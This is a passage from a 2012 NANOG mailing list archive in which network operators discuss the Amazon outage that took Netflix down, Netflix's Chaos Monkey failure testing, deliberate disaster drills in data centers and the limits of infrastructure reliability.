on what I should be looking for to classify it as being "broken" though.

Mike

From drais at icantclick.org Mon Jul 2 11:13:22 2012
From: drais at icantclick.org (david raistrick)
Date: Mon, 2 Jul 2012 12:13:22 -0400 (EDT)
Subject: FYI Netflix is down
In-Reply-To: <20120702160909.GA65216@ussenterprise.ufp.org>
References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org>
Message-ID:

On Mon, 2 Jul 2012, Leo Bicknell wrote:

> I used to work with a guy who had a simple test for these things,
> and if I was a VP at Amazon, Netflix, or any other large company I
> would do the same. About once a month he would walk out on the

you mean like this?

http://techblog.netflix.com/2011/07/netflix-simian-army.html

--
david raistrick http://www.netmeister.org/news/learn2quote.html
drais at icantclick.org

From bicknell at ufp.org Mon Jul 2 11:17:46 2012
From: bicknell at ufp.org (Leo Bicknell)
Date: Mon, 2 Jul 2012 09:17:46 -0700
Subject: FYI Netflix is down
In-Reply-To:
References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org>
Message-ID: <20120702161746.GA65753@ussenterprise.ufp.org>

In a message written on Mon, Jul 02, 2012 at 12:13:22PM -0400, david raistrick wrote:
> you mean like this?
>
> http://techblog.netflix.com/2011/07/netflix-simian-army.html

Yes, Netflix seems to get it, and I think their Simian Army is a
great Q&A tool.
However, it is not a complete testing system; I have never seen them
talk about testing non-software components, and I hope they do that
as well. As we saw in the previous Amazon outage, part of the problem
was a circuit breaker configuration.

--
Leo Bicknell - bicknell at ufp.org - CCIE 3440
PGP keys at http://www.ufp.org/~bicknell/

From drais at icantclick.org Mon Jul 2 11:23:57 2012
From: drais at icantclick.org (david raistrick)
Date: Mon, 2 Jul 2012 12:23:57 -0400 (EDT)
Subject: FYI Netflix is down
In-Reply-To: <20120702161746.GA65753@ussenterprise.ufp.org>
References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org>
Message-ID:

On Mon, 2 Jul 2012, Leo Bicknell wrote:

>> http://techblog.netflix.com/2011/07/netflix-simian-army.html
>
> Yes, Netflix seems to get it, and I think their Simian Army is a
> great Q&A tool. However, it is not a complete testing system, I
> have never seen them talk about testing non-software components,
> and I hope they do that as well. As we saw in the previous Amazon
> outage, part of the problem was a circuit breaker configuration.

When the hardware is outsourced how would you propose testing the
non-software components? They do simulate availability zone issues (and
AZ is as close as you get to controlling which internal power/network/etc
grid you're attached to).

I suppose they could introduce artificial network latency/loss @ each
instance - and could add testing around what happens when amazon's API
disappears (as was the case friday).

Beyond that....the rest of it is up to the hardware provider (Amazon, in
this case).
..david (who also relies on outsourced hardware these days)

--
david raistrick http://www.netmeister.org/news/learn2quote.html
drais at icantclick.org

From nanog at armoredpackets.com Mon Jul 2 11:31:26 2012
From: nanog at armoredpackets.com (AP NANOG)
Date: Mon, 02 Jul 2012 12:31:26 -0400
Subject: FYI Netflix is down
In-Reply-To: <20120702160909.GA65216@ussenterprise.ufp.org>
References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org>
Message-ID: <4FF1CCDE.4040103@armoredpackets.com>

This is an excellent example of how tests "should" be run; unfortunately
far too many places don't do this...

--
Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel

On 7/2/12 12:09 PM, Leo Bicknell wrote:
> In a message written on Mon, Jul 02, 2012 at 11:30:06AM -0400, Todd Underwood wrote:
>> from the perspective of people watching B-rate movies: this was a
>> failure to implement and test a reliable system for streaming those
>> movies in the face of a power outage at one facility.
> I want to emphasize _and test_.
>
> Work on an infrastructure which is redundant and designed to provide
> "100% uptime" (which is impossible, but that's another story) means
> that there should be confidence in a failure being automatically
> worked around, detected, and reported.
>
> I used to work with a guy who had a simple test for these things,
> and if I was a VP at Amazon, Netflix, or any other large company I
> would do the same. About once a month he would walk out on the
> floor of the data center and break something. Pull out an ethernet.
> Unplug a server. Flip a breaker.
>
> Then he would wait, to see how long before a technician came to fix
> it.
>
> If these activities were service impacting to customers the engineering
> or implementation was faulty, and remediation was performed.
> Assuming
> they acted as designed and the customers saw no faults the team was
> graded on how quickly they detected and corrected the outage.
>
> I've seen too many companies whose "test" is planned months in advance,
> and who exclude the parts they think aren't up to scratch from the test.
> Then an event occurs, and they fail, and take down customers.
>
> TL;DR If you're not confident your operation could withstand someone
> walking into your data center and randomly doing something, you are
> NOT redundant.
>

From shortdudey123 at gmail.com Mon Jul 2 11:42:27 2012
From: shortdudey123 at gmail.com (Grant Ridder)
Date: Mon, 2 Jul 2012 11:42:27 -0500
Subject: FYI Netflix is down
In-Reply-To: <4FF1CCDE.4040103@armoredpackets.com>
References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <4FF1CCDE.4040103@armoredpackets.com>
Message-ID:

The problem is large scale tests take a lot of time and planning. For it
to be done right, you really need a dedicated DR team.

-Grant

On Mon, Jul 2, 2012 at 11:31 AM, AP NANOG wrote:

> This is an excellent example of how tests "should" be run; unfortunately
> far too many places don't do this...
>
>
> --
>
> Thank you,
>
> Robert Miller
> http://www.armoredpackets.com
>
> Twitter: @arch3angel
>
> On 7/2/12 12:09 PM, Leo Bicknell wrote:
>
>> In a message written on Mon, Jul 02, 2012 at 11:30:06AM -0400, Todd
>> Underwood wrote:
>>
>>> from the perspective of people watching B-rate movies: this was a
>>> failure to implement and test a reliable system for streaming those
>>> movies in the face of a power outage at one facility.
>>>
>> I want to emphasize _and test_.
>>
>> Work on an infrastructure which is redundant and designed to provide
>> "100% uptime" (which is impossible, but that's another story) means
>> that there should be confidence in a failure being automatically
>> worked around, detected, and reported.
>>
>> I used to work with a guy who had a simple test for these things,
>> and if I was a VP at Amazon, Netflix, or any other large company I
>> would do the same. About once a month he would walk out on the
>> floor of the data center and break something. Pull out an ethernet.
>> Unplug a server. Flip a breaker.
>>
>> Then he would wait, to see how long before a technician came to fix
>> it.
>>
>> If these activities were service impacting to customers the engineering
>> or implementation was faulty, and remediation was performed. Assuming
>> they acted as designed and the customers saw no faults the team was
>> graded on how quickly they detected and corrected the outage.
>>
>> I've seen too many companies whose "test" is planned months in advance,
>> and who exclude the parts they think aren't up to scratch from the test.
>> Then an event occurs, and they fail, and take down customers.
>>
>> TL;DR If you're not confident your operation could withstand someone
>> walking into your data center and randomly doing something, you are
>> NOT redundant.
>>
>>
>

From joly at punkcast.com Mon Jul 2 11:53:03 2012
From: joly at punkcast.com (Joly MacFie)
Date: Mon, 2 Jul 2012 12:53:03 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <4FF1C8B6.6010503@mtcc.com>
References: <23616229.12018.1341245044739.JavaMail.root@benjamin.baylink.com> <4FF1C8B6.6010503@mtcc.com>
Message-ID:

Made the press..
http://www.washingtonpost.com/business/technology/leap-second-bug-takes-down-reddit-and-a-bunch-of-other-sites/2012/07/02/gJQAlXg1HW_story.html

--
---------------------------------------------------------------
Joly MacFie 218 565 9365 Skype:punkcast WWWhatsup NYC - http://wwwhatsup.com
http://pinstand.com - http://punkcast.com
VP (Admin) - ISOC-NY - http://isoc-ny.org
--------------------------------------------------------------
-

From bicknell at ufp.org Mon Jul 2 12:53:00 2012
From: bicknell at ufp.org (Leo Bicknell)
Date: Mon, 2 Jul 2012 10:53:00 -0700
Subject: FYI Netflix is down
In-Reply-To:
References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org>
Message-ID: <20120702175300.GA69672@ussenterprise.ufp.org>

In a message written on Mon, Jul 02, 2012 at 12:23:57PM -0400, david raistrick wrote:
> When the hardware is outsourced how would you propose testing the
> non-software components? They do simulate availability zone issues (and
> AZ is as close as you get to controlling which internal power/network/etc
> grid you're attached to).

Find a provider with a similar methodology. Perhaps Netflix never
conducts a power test, but their colo vendor would perform such
testing.

If no colo providers exist that share their values on testing, that
may be a sign that outsourcing it isn't the right answer...

--
Leo Bicknell - bicknell at ufp.org - CCIE 3440
PGP keys at http://www.ufp.org/~bicknell/

From cb.list6 at gmail.com Mon Jul 2 13:20:45 2012
From: cb.list6 at gmail.com (Cameron Byrne)
Date: Mon, 2 Jul 2012 11:20:45 -0700
Subject: FYI Netflix is down
In-Reply-To: <20120702175300.GA69672@ussenterprise.ufp.org>
References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org>
Message-ID:

On Jul 2, 2012 10:53 AM, "Leo Bicknell" wrote:
>
> In a message written on Mon, Jul 02, 2012 at 12:23:57PM -0400, david raistrick wrote:
> > When the hardware is outsourced how would you propose testing the
> > non-software components? They do simulate availability zone issues (and
> > AZ is as close as you get to controlling which internal power/network/etc
> > grid you're attached to).
>
> Find a provider with a similar methodology. Perhaps Netflix never
> conducts a power test, but their colo vendor would perform such
> testing.
>
> If no colo providers exist that share their values on testing, that
> may be a sign that outsourcing it isn't the right answer...
>
> --
> Leo Bicknell - bicknell at ufp.org - CCIE 3440
> PGP keys at http://www.ufp.org/~bicknell/

I suggest using RAIC

Redundant array of inexpensive clouds.

Make your chaos animal go after sites and regions instead of individual
VMs.
CB

From egon at egon.cc Mon Jul 2 13:30:11 2012
From: egon at egon.cc (James Downs)
Date: Mon, 2 Jul 2012 11:30:11 -0700
Subject: FYI Netflix is down
In-Reply-To:
References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org>
Message-ID: <78E0D635-D7CD-4BAC-98EB-6256234C45F2@egon.cc>

On Jul 2, 2012, at 9:23 AM, david raistrick wrote:

> When the hardware is outsourced how would you propose testing the non-software components? They do simulate availability zone issues (and AZ is as close as you get to controlling which internal power/network/etc grid you're attached to).

We all know what netflix *says* they do, but they *did* have an outage.

-j

From tony.mccrory at gmail.com Mon Jul 2 13:53:32 2012
From: tony.mccrory at gmail.com (Tony McCrory)
Date: Mon, 2 Jul 2012 19:53:32 +0100
Subject: FYI Netflix is down
In-Reply-To:
References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org>
Message-ID:

On 2 July 2012 19:20, Cameron Byrne wrote:

>
> Make your chaos animal go after sites and regions instead of individual
> VMs.
>
> CB
>

From a previous post mortem
http://techblog.netflix.com/2011_04_01_archive.html

"
Create More Failures
Currently, Netflix uses a service called "Chaos Monkey" to simulate
service failure. Basically, Chaos Monkey is a service that kills other
services. We run this service because we want engineering teams to be
used to a constant level of failure in the cloud. Services should
automatically recover without any manual intervention.
We don't however, simulate what happens when an entire AZ goes down and
therefore we haven't engineered our systems to automatically deal with
those sorts of failures. Internally we are having discussions about doing
that and people are already starting to call this service "Chaos Gorilla".
"

It would seem the Gorilla hasn't quite matured.

Tony

From paul at paulgraydon.co.uk Mon Jul 2 13:59:57 2012
From: paul at paulgraydon.co.uk (Paul Graydon)
Date: Mon, 02 Jul 2012 08:59:57 -1000
Subject: FYI Netflix is down
In-Reply-To:
References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org>
Message-ID: <4FF1EFAD.6000204@paulgraydon.co.uk>

On 07/02/2012 08:53 AM, Tony McCrory wrote:
> On 2 July 2012 19:20, Cameron Byrne wrote:
>
>> Make your chaos animal go after sites and regions instead of individual
>> VMs.
>>
>> CB
>>
> From a previous post mortem
> http://techblog.netflix.com/2011_04_01_archive.html
>
> "
> Create More Failures
> Currently, Netflix uses a service called "Chaos
> Monkey"
> to simulate service failure. Basically, Chaos Monkey is a service that
> kills other services. We run this service because we want engineering teams
> to be used to a constant level of failure in the cloud. Services should
> automatically recover without any manual intervention. We don't however,
> simulate what happens when an entire AZ goes down and therefore we haven't
> engineered our systems to automatically deal with those sorts of failures.
> Internally we are having discussions about doing that and people are
> already starting to call this service "Chaos Gorilla".
> "
>
> It would seem the Gorilla hasn't quite matured.
>
> Tony

From conversations with Adrian Cockcroft this weekend it wasn't the
result of Chaos Gorilla or Chaos Monkey failing to prepare them
adequately.
All their automated stuff worked perfectly, the infrastructure tried to
self heal. The problem was that yet again Amazon's back-plane /
control-plane was unable to cope with the requests. Netflix uses Amazon's
ELB to balance the traffic and no back-plane meant they were unable to
reconfigure it to route around the problem.

Paul

From egon at egon.cc Mon Jul 2 14:08:18 2012
From: egon at egon.cc (James Downs)
Date: Mon, 2 Jul 2012 12:08:18 -0700
Subject: FYI Netflix is down
In-Reply-To: <4FF1EFAD.6000204@paulgraydon.co.uk>
References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk>
Message-ID:

On Jul 2, 2012, at 11:59 AM, Paul Graydon wrote:

> back-plane / control-plane was unable to cope with the requests. Netflix uses Amazon's ELB to balance the traffic and no back-plane meant they were unable to reconfigure it to route around the problem.

Someone needs to define back-plane/control-plane in this case. (and what
wasn't working)

During the height of the problems, what I saw was a Netflix A record
pointing at a broken ELB. If there was an ELB to point to in another AZ,
it wouldn't take anything from Amazon to change that A record, as Netflix
uses ultradns.

-j

From george.herbert at gmail.com Mon Jul 2 14:08:28 2012
From: george.herbert at gmail.com (George Herbert)
Date: Mon, 2 Jul 2012 12:08:28 -0700
Subject: FYI Netflix is down
In-Reply-To: <4FEEAB1B.7030806@deaddrop.org>
References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEE978E.8060300@gmail.com> <4FEEAB1B.7030806@deaddrop.org>
Message-ID:

Late reply, but:

On Sat, Jun 30, 2012 at 12:30 AM, Lynda wrote:
>...
> Second, and more important.
> I *was* a "computer science guy" in a past life,
> and this is nonsense. You can have astonishingly large software projects
> that just continue to run smoothly, day in, day out, and they don't hit the
> news, because they don't break. There are data centers that don't hit the
> news, in precisely the same way.

I really need to write the book on IT reliability I keep meaning to.

There's reliability - backwards looking statistical, which can be 100%
for a given service or datacenter - and then there's dependability,
forwards-predicted outage risks, which people often *assert* equals
the prior reliability record, but in reality you often have a number
of latent failures (and latent cascade paths) that you do not
understand, did not identify previously, and are not aware of.

I've had or had to respond to over a billion dollars of cumulative IT
disaster loss over my consulting career so far; I have NEVER seen
anyone who did it perfect, even the best pros. And I include myself
in that list.

Looking at other fields like aerospace and nuclear engineering, what
is done in IT is not anywhere close to the same level of QA and
engineering analysis and testing. We cannot assert better results
with less work.

"Oh, that never happens", except I've had my stuff in three locations
that had catastrophic generator failures. "Oh, that never happens"
when you're doing power maintenance and the best-rated electrical
company in California, in conjunction with the generator vendor and a
couple of independent power EEs, mis-balance the maintenance generator
loads between legs and blow the generators and datacenter. "Oh, that
never happens" that the datacenter burns (or starts to burn and then
gets flooded). "Oh, that never happens" that the FM-200 goes off or
preaction breaks and water leaks. "Oh, that never happens" that well
maintained and monitored and triple-redundant AC units all trip
offline due to a common mode failure over the course of a weekend and
the room gets up to 106 degrees. Oh thank god the next thing didn't
go wrong in THAT situation, because the spot temperature meters
indicated that the ceiling height of that particular room peaked at 1
degree short of the temp at which the sprinkler heads are supposed to
discharge, so we nearly lost that room to flooding rather than just a
10% disk and 15% power supply attrition over the next year...

Don't be so confident in the infrastructure. It's not engineered or
built or maintained well enough to actually support that assertion.
The same can be said of the application software and application
architecture and integration.

--
-george william herbert
george.herbert at gmail.com

From dgolding at ragingwire.com Mon Jul 2 14:25:54 2012
From: dgolding at ragingwire.com (Dan Golding)
Date: Mon, 2 Jul 2012 12:25:54 -0700
Subject: FYI Netflix is down
In-Reply-To: <20120702160909.GA65216@ussenterprise.ufp.org>
References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org>
Message-ID: <1C7B96053DD7814496A0D1E71661B68302CF5C3E@SMF-ENTXM-001.sac.ragingwire.net>

> -----Original Message-----
> From: Leo Bicknell [mailto:bicknell at ufp.org]
>
>
> I want to emphasize _and test_.

[snip]

>
> I used to work with a guy who had a simple test for these things, and
> if I was a VP at Amazon, Netflix, or any other large company I would do
> the same. About once a month he would walk out on the floor of the
> data center and break something. Pull out an ethernet.
> Unplug a server. Flip a breaker.
>

*DING DING* - we have a winner!

In a previous life, I used to spend a lot of time in other people's data
centers. The key question to ask was how often they pulled the plug - i.e.
disconnected utility power without having backup generators running.
Simulating an actual failure. That goes for pulling out an Ethernet cord
or unplugging a server, or flipping a breaker. It's all the same.

The problem is that if you don't do this for a while, you get SCARED of
doing it, and you stop doing it. The longer you go without, the scarier
it gets, to the point where you will never do it, because you have no
idea what will happen, other than you probably getting fired. This is
called "horrible engineering management", and is very common.

The other problem, of course, is that people design under the assumption
that everything will always work, and that failure modes, when they
occur, are predictable and fall into a narrow set. Multiple failure
modes? Not tested. Failure modes including operator error? Never tested.

When was the last time you had a drill?

- Dan

> Then he would wait, to see how long before a technician came to fix it.
>
> If these activities were service impacting to customers the engineering
> or implementation was faulty, and remediation was performed. Assuming
> they acted as designed and the customers saw no faults the team was
> graded on how quickly they detected and corrected the outage.
>
> I've seen too many companies whose "test" is planned months in advance,
> and who exclude the parts they think aren't up to scratch from the
> test.
> Then an event occurs, and they fail, and take down customers.
>
> TL;DR If you're not confident your operation could withstand someone
> walking into your data center and randomly doing something, you are NOT
> redundant.
>
> --
> Leo Bicknell - bicknell at ufp.org - CCIE 3440
> PGP keys at http://www.ufp.org/~bicknell/

From nanog at armoredpackets.com Mon Jul 2 14:32:52 2012
From: nanog at armoredpackets.com (AP NANOG)
Date: Mon, 02 Jul 2012 15:32:52 -0400
Subject: FYI Netflix is down
In-Reply-To: <4FF1EFAD.6000204@paulgraydon.co.uk>
References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk>
Message-ID: <4FF1F764.2060701@armoredpackets.com>

I believe in my dictionary Chaos Gorilla translates into "Time To Go
Home", with a rough definition of "Everything just crapped out - The world
is ending"; but then again I may have that incorrect :-)

--
Thank you,

Robert Miller
http://www.armoredpackets.com

Twitter: @arch3angel

On 7/2/12 2:59 PM, Paul Graydon wrote:
> On 07/02/2012 08:53 AM, Tony McCrory wrote:
>> On 2 July 2012 19:20, Cameron Byrne wrote:
>>
>>> Make your chaos animal go after sites and regions instead of individual
>>> VMs.
>>>
>>> CB
>>>
>> From a previous post mortem
>> http://techblog.netflix.com/2011_04_01_archive.html
>>
>> "
>> Create More Failures
>> Currently, Netflix uses a service called "Chaos
>> Monkey"
>>
>> to simulate service failure. Basically, Chaos Monkey is a service that
>> kills other services. We run this service because we want engineering
>> teams
>> to be used to a constant level of failure in the cloud. Services should
>> automatically recover without any manual intervention. We don't however,
>> simulate what happens when an entire AZ goes down and therefore we
>> haven't
>> engineered our systems to automatically deal with those sorts of
>> failures.
>> Internally we are having discussions about doing that and people are
>> already starting to call this service "Chaos Gorilla".
>> "
>>
>> It would seem the Gorilla hasn't quite matured.
>>
>> Tony
> From conversations with Adrian Cockcroft this weekend it wasn't the
> result of Chaos Gorilla or Chaos Monkey failing to prepare them
> adequately. All their automated stuff worked perfectly, the
> infrastructure tried to self heal. The problem was that yet again
> Amazon's back-plane / control-plane was unable to cope with the
> requests. Netflix uses Amazon's ELB to balance the traffic and no
> back-plane meant they were unable to reconfigure it to route around
> the problem.
>
> Paul
>
>

From joly at punkcast.com Mon Jul 2 14:36:21 2012
From: joly at punkcast.com (Joly MacFie)
Date: Mon, 2 Jul 2012 15:36:21 -0400
Subject: FYI Netflix is down
In-Reply-To: <4FF1F764.2060701@armoredpackets.com>
References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <4FF1F764.2060701@armoredpackets.com>
Message-ID:

Good band name.

> Chaos Gorilla

--
---------------------------------------------------------------
Joly MacFie 218 565 9365 Skype:punkcast WWWhatsup NYC - http://wwwhatsup.com
http://pinstand.com - http://punkcast.com
VP (Admin) - ISOC-NY - http://isoc-ny.org
--------------------------------------------------------------
-

From mooregr at greenms.com Mon Jul 2 14:43:29 2012
From: mooregr at greenms.com (Greg D. Moore)
Date: Mon, 02 Jul 2012 15:43:29 -0400
Subject: FYI Netflix is down
In-Reply-To:
References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEE978E.8060300@gmail.com> <4FEEAB1B.7030806@deaddrop.org>
Message-ID:

At 03:08 PM 7/2/2012, George Herbert wrote:

If folks have not read it, I would suggest reading Normal Accidents by
Charles Perrow.
The "it can't happen" is almost guaranteed to happen. ;-) And when it
does, it'll often interact in ways we can't predict or sometimes even
understand.

As for pulling the plug to test stuff. I recall a demo at Netapps in the
early 00's. They were talking about their fault tolerance and how great
it was. So I walked up to their demo array and said, "So, it shouldn't be
a problem if I pulled this drive right here?"

Before I could, the salesperson or tech guy, can't remember, told me to
stop. He didn't want to risk it.

That right there said loads about their confidence in their own system.

>Late reply, but:
>
>On Sat, Jun 30, 2012 at 12:30 AM, Lynda wrote:
> >...
> > Second, and more important. I *was* a "computer science guy" in a
> past life,
> > and this is nonsense. You can have astonishingly large software projects
> > that just continue to run smoothly, day in, day out, and they don't hit the
> > news, because they don't break. There are data centers that don't hit the
> > news, in precisely the same way.
>
>I really need to write the book on IT reliability I keep meaning to.
>
>There's reliability - backwards looking statistical, which can be 100%
>for a given service or datacenter - and then there's dependability,
>forwards-predicted outage risks, which people often *assert* equals
>the prior reliability record, but in reality you often have a number
>of latent failures (and latent cascade paths) that you do not
>understand, did not identify previously, and are not aware of.
>
>I've had or had to respond to over a billion dollars of cumulative IT
>disaster loss over my consulting career so far; I have NEVER seen
>anyone who did it perfect, even the best pros. And I include myself
>in that list.
>
>Looking at other fields like aerospace and nuclear engineering, what
>is done in IT is not anywhere close to the same level of QA and
>engineering analysis and testing. We cannot assert better results
>with less work.
>
>"Oh, that never happens", except I've had my stuff in three locations
>that had catastrophic generator failures. "Oh, that never happens"
>when you're doing power maintenance and the best-rated electrical
>company in California, in conjunction with the generator vendor and a
>couple of independent power EEs, mis-balance the maintenance generator
>loads between legs and blow the generators and datacenter. "Oh, that
>never happens" that the datacenter burns (or starts to burn and then
>gets flooded). "Oh, that never happens" that the FM-200 goes off or
>preaction breaks and water leaks. "Oh, that never happens" that well
>maintained and monitored and triple-redundant AC units all trip
>offline due to a common mode failure over the course of a weekend and
>the room gets up to 106 degrees. Oh thank god the next thing didn't
>go wrong in THAT situation, because the spot temperature meters
>indicated that the ceiling height of that particular room peaked at 1
>degree short of the temp at which the sprinkler heads are supposed to
>discharge, so we nearly lost that room to flooding rather than just a
>10% disk and 15% power supply attrition over the next year...
>
>Don't be so confident in the infrastructure. It's not engineered or
>built or maintained well enough to actually support that assertion.
>The same can be said of the application software and application
>architecture and integration.
>
>
>--
>-george william herbert
>george.herbert at gmail.com

Greg D. Moore http://greenmountainsoftware.wordpress.com/
CEO QuiCR: Quick, Crowdsourced Responses.
http://www.quicr.net

From drais at icantclick.org Mon Jul 2 15:20:24 2012
From: drais at icantclick.org (david raistrick)
Date: Mon, 2 Jul 2012 16:20:24 -0400 (EDT)
Subject: FYI Netflix is down
In-Reply-To:
References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk>
Message-ID:

On Mon, 2 Jul 2012, James Downs wrote:

>> back-plane / control-plane was unable to cope with the requests. Netflix uses Amazon's ELB to balance the traffic and no back-plane meant they were unable to reconfigure it to route around the problem.
>
> Someone needs to define back-plane/control-plane in this case. (and what
> wasn't working)

Amazon resources are controlled (from a consumer viewpoint) by API - that API is also used by amazon's internal toolkits that support ELB (and RDS..). Those (http accessed) API interfaces were unavailable for a good portion of the outages.

I know nothing of the netflix side of it - but that's what -we- saw. (and that caused all us-east RDS instances in every AZ to appear offline..)
--
david raistrick http://www.netmeister.org/news/learn2quote.html
drais at icantclick.org

From rbf+nanog at panix.com Mon Jul 2 15:32:17 2012
From: rbf+nanog at panix.com (Brett Frankenberger)
Date: Mon, 2 Jul 2012 15:32:17 -0500
Subject: FYI Netflix is down
In-Reply-To: <20120702160909.GA65216@ussenterprise.ufp.org>
References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org>
Message-ID: <20120702203216.GA1208@panix.com>

On Mon, Jul 02, 2012 at 09:09:09AM -0700, Leo Bicknell wrote:
> In a message written on Mon, Jul 02, 2012 at 11:30:06AM -0400, Todd Underwood wrote:
> > from the perspective of people watching B-rate movies: this was a
> > failure to implement and test a reliable system for streaming those
> > movies in the face of a power outage at one facility.
>
> I want to emphasize _and test_.
>
> Work on an infrastructure which is redundant and designed to provide
> "100% uptime" (which is impossible, but that's another story) means
> that there should be confidence in a failure being automatically
> worked around, detected, and reported.
>
> I used to work with a guy who had a simple test for these things,
> and if I was a VP at Amazon, Netflix, or any other large company I
> would do the same. About once a month he would walk out on the
> floor of the data center and break something. Pull out an ethernet.
> Unplug a server. Flip a breaker.

Sounds like something a VP would do. And, actually, it's an important step: make sure the easy failures are covered.

But it's really a very small part of resilience. What happens when one instance of a shared service starts performing slowly? What happens when one instance of a redundant database starts timing out queries or returning empty result sets? What happens when the Ethernet interface starts dropping 10% of the packets across it?
What happens when the Ethernet switch linecard locks up and stops passing dataplane traffic, but link (physical layer) and/or control plane traffic flows just fine? What happens when the server kernel panics due to bad memory, reboots, gets all the way up, runs for 30 seconds, kernel panics, lather, rinse, repeat.

Reliability is hard. And if you stop looking once you get to the point where you can safely toggle the power switch without causing an impact, you're only a very small part of the way there.

-- Brett

From dgolding at ragingwire.com Mon Jul 2 15:51:26 2012
From: dgolding at ragingwire.com (Dan Golding)
Date: Mon, 2 Jul 2012 13:51:26 -0700
Subject: FYI Netflix is down
In-Reply-To:
References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEE978E.8060300@gmail.com> <4FEEAB1B.7030806@deaddrop.org>
Message-ID: <1C7B96053DD7814496A0D1E71661B68302CF5C6A@SMF-ENTXM-001.sac.ragingwire.net>

> -----Original Message-----
> From: Greg D. Moore [mailto:mooregr at greenms.com]
>
> > If folks have not read it, I would suggest reading Normal Accidents by
> Charles Perrow.
>

Also, Human Error by James Reason.

From george.herbert at gmail.com Mon Jul 2 16:04:08 2012
From: george.herbert at gmail.com (George Herbert)
Date: Mon, 2 Jul 2012 14:04:08 -0700
Subject: FYI Netflix is down
In-Reply-To:
References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEE978E.8060300@gmail.com> <4FEEAB1B.7030806@deaddrop.org>
Message-ID:

On Mon, Jul 2, 2012 at 12:43 PM, Greg D. Moore wrote:
> At 03:08 PM 7/2/2012, George Herbert wrote:
>
> If folks have not read it, I would suggest reading Normal Accidents by
> Charles Perrow.
>
